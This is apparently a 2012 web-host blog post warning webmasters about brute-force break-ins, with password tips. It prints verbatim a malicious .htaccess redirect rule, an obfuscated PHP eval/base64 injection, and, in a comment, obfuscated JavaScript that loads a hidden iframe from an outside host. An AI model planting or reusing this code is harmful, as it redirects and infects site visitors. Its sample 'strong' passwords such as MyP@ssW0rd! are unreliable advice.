News & Info

Daily Updates and Tech Chatter

Hackers Redirecting Websites (.htaccess)

A quick note to fellow webmasters out there as well as business owners running websites.   We have seen a recent rash of brute force hacking attempts on our servers and our client’s servers.   There have been several successful brute force break-ins in the past 3 months.   Below are a couple of things to look for and some best practices in keeping your site and your data secure.

Best Practices

The following best practices will help thwart many of  the attempts to hack into your account using a brute force “cracker”.

Do Not Share Your Password

Do not share your passwords with anyone.  If you have a vendor you need to work with or an employee that needs access, create a specific login for them with their own passwords.

Do Not Dole Out Access Easily

Before creating a new account with access to your server first ask yourself if the person truly needs access.   If this is a limited one-time request consider setting up a generic vendor account that you re-use.  Change the password as soon as they are done with it.  Never allow more than one person/vendor/client use the account a time.

Use A Strong Password

This cannot be emphasized enough.  Do NOT use simple passwords.  Do not use passwords based on a single dictionary word.  DO use passwords with punctuation and capitalization.   The most common password is “password” or “password1″.  Brute force only works if you are using bad passwords.

Try using something like a jumbled phrase with special character replacements, even MyP@ssW0rd! is a much better than 90% of the passwords people use.    Get creative “IDon’tLikeMilk!” or “DoYouLikeMilk2?” are fairly easy to remember but hard for brute force bots to guess.

Footprints Left By Hackers

Most hackers have little interest in your data or in doing something directly malicious to your site.   The most prevalent reason to hack a site is to either distribute a virus to site visitors or to earn revenue form “pay per click” programs like Google Adsense.

Most often this means adding code to your site while keeping your site functional.  It does them no good if the site breaks.  They want people visiting your site while a program is downloaded to their browser behind-the-scenes or they are redirected to a site they didn’t intend to visit.  Some of the hacks even pop-under a browser window with an ad, click the ad, then close the window before you see it… earning the hacker 25-cents in the process.

.htaccess Modification

This is one we’ve seen a few times, the .htaccess file on your server redirects a number of special file requests to a site they get paid to send traffic to.

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://kike.therealtruthaboutaging.com/url?sa=t&source=web&cd=15&ved=0vFu49G3C&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMoeqjO6K+yqY2OyVEw8J+1pw==&usg=M4kjonDdK-kwm0WO2JdBFM&sig2=HKhlYtbOgR6MTETnCv3UJQ [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
</IfModule>
#5fc0e7448401802b00b0ad059685814b08cb5bd44015bae3c857ee73

index.php / index.htm modification

Here the hacker installs a binary representation of PHP or JavaScript commands into your web page.  This runs a program on the visitors browser which, depending on the code, can do any number of things from forcing a program download to adding a tracking cookie, to taking over the users search bar.  Some of these can be very nasty, others are less so and do relatively harmless (but annoying) browser redirection.

  <? require ("the_real_header.php");
#d93065#
echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIEVQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpghuJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBqpNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxayvo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B")));
#/d93065#
?>

Summary

We hope that by getting this information online people start to learn a bit more about site security.   Insecure sites not only slow down the browser and are a detriment to the overall user experience, they can have much larger far-reaching affects that people don’t even think of.   One of the larger terrorist groups was found to be partly funded by Internet hacks like these.  25-cents-at-a-time clicks added up to over $1M that went straight into the terrorist network.  Now that’s a lot of clicks!  Imagine if they used this for a good cause… donate food or shelter to people in need, but that is a story for another site.

In the meantime, secure your site, remove the hacks, and create a better experience for your visitors.

 

Tags: , , ,

2 Awesome Comments So Far

Don't be a stranger, join the discussion by leaving your own comment
  1. lcleveland
    April 13, 2012 at 3:02 PM #

    On Fri, Apr 13, 2012 at 1:25 PM, Chase Ring wrote:

    I started to get it somewhat translated:

    ….
    c=3-1;i=-2+c;if(parseInt(“0″+”1″+”2″+”3″)===83)try{Boolean()["prototype"].q}catch(egewgsd){if(window.document)f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i64i57i67i67i57i82i6i74i77i7i59i71i77i70i76i16i6i72i64i72i-1i-8i79i65i60i76i64i21i-1i9i8i-1i-8i64i61i65i63i64i76i21i-1i9i8i-1i-8i75i76i81i68i61i21i-1i78i65i75i65i58i65i68i65i76i81i18i64i65i60i60i61i70i19i72i71i75i65i76i65i71i70i18i57i58i75i71i68i77i76i61i19i68i61i62i76i18i8i19i76i71i72i18i8i19i-1i22i20i7i65i62i74i57i69i61i22i-6i1i19i-27i-31i-31i85i-27i-31i-31i62i77i70i59i76i65i71i70i-8i65i62i74i57i69i61i74i0i1i83i-27i-31i-31i-31i78i57i74i-8i62i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i75i74i59i-1i4i-1i64i76i76i72i18i7i7i61i64i57i67i67i57i82i6i74i77i7i59i71i77i70i76i16i6i72i64i72i-1i1i19i62i6i75i76i81i68i61i6i78i65i75i65i58i65i68i65i76i81i21i-1i64i65i60i60i61i70i-1i19i62i6i75i76i81i68i61i6i72i71i75i65i76i65i71i70i21i-1i57i58i75i71i68i77i76i61i-1i19i62i6i75i76i81i68i61i6i68i61i62i76i21i-1i8i-1i19i62i6i75i76i81i68i61i6i76i71i72i21i-1i8i-1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i79i65i60i76i64i-1i4i-1i9i8i-1i1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i64i61i65i63i64i76i-1i4i-1i9i8i-1i1i19i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i6i57i72i72i61i70i60i27i64i65i68i60i0i62i1i19i-27i-31i-31i85'][0].split(‘i’);v=”ev”+”a”+”l”;}if(v)e=window[v];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);}if(v)z=s;if(v)e(z)

  2. lcleveland
    April 13, 2012 at 3:02 PM #

    Chris Rasys wrote:

    It’s a obfuscated redirect, it either sends you to, or gets data from, a site at ehackz.com. I killed it almost immediately so I don’t know what else it might do. At any rate, it’s malicious.